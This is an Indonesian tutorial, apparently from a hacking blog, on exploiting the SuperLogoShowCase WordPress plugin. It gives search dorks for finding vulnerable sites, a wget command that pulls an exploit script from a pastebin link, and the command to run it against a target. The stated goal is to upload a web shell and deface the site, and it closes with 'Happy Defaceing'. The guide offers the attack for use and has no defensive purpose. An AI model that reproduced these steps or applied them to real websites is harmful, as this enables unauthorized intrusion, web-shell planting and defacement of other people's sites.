Hallo kawan kawan kembali lagi sama saya oke pada pertemuan kali ini saya akan memberikan sebuah tutorial bagaimana cara memanfaatkan bug SuperLogoShowCase pada plugins website .. nah teknik ini sama seperti di artikel sebelumnya yaitu pada plugins SuperStoreFinder
Oke kita lanjut... tahap nya juga sama seperti yang pada artikelnya sebelumnya
awal awal yang kalian harus lakukan yaitu mencari site yang sekiranya lemah menggunakan dork? apa dorknya mas?...
Dork : "SuperLogoShowCase-wp"
"inurl:/wp-content/plugins/plugins/superlogoshowcase-wp/"
selebihnya your brain :v
Sebelum mengeksekusi Site kita akan mendownload tools nya terlebih dauhlu saya akan membakian source code dibawah ini ...
kalian install di termux atau terminal dengan command
wget https://pastebin.com/raw/pMuFWLLm -O exploit.py
Berhubungan ini tools menggunakan bahasa python maka kita akan memberikan format .py yang wajib digunakan disetipan file python
oke sekarang kita mulai exploitasi dengan menggunakan python2
python2 exploit.py https://target.com/
Disini kita hanya memasukan site target tanpa path , karna path sudah otomatis ter detect di dalam tools nya secara default , maka dari itu kalian hanya memasukan site targetnya saja ...
seperti yang terlihat di gambar di atas kalian pilih opsi nomor 0 karna yg kita targetkan yaitu bug superlogoshowcase-wp nya :)
dan jika vuln / ter upload shel nya akan seperti ini ... contoh gambar dibawah
anddd!!! kalian akses shellnya :D
Oke Happy Defaceing :D sampai jumpa and next materiii :D
Thanks To S4ndal.py
